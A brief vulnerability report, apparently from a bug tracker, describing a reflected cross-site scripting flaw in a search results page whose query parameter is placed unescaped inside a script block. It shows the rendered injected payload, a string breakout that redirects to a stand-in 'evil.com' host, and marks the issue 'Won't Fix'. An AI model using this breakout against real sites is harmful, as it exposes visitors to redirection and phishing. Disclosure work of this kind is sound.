XSS vulnerability through the search results page.
The search query is sent as a GET parameter and is not escaped when rendered within a JavaScript block on the search results page. This allows code to be executed directly from a malicious URL.
<script type="text/javascript">loadTextValues("");location='http://evil.com'//", "", "");</script>
Reported Won't Fix
Back